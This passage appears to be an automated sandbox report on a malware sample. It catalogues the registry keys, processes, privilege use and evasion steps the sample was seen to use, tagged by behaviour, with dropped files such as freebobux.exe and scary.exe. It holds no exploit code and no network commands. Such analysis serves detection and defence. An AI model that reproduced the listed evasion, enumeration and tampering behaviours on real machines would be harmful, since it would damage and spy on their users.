Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEFixedFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEFixedFontName = "Cordia New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEPropFontName = "MS PGothic" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEPropFontName = "Sylfaen" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEFixedFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" C:\Windows\SysWOW64\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\URL Protocol C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\\bloatware\\3.exe\" -- \"%1\"" C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\ = "URL:psiphon" C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Runs net.exe

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
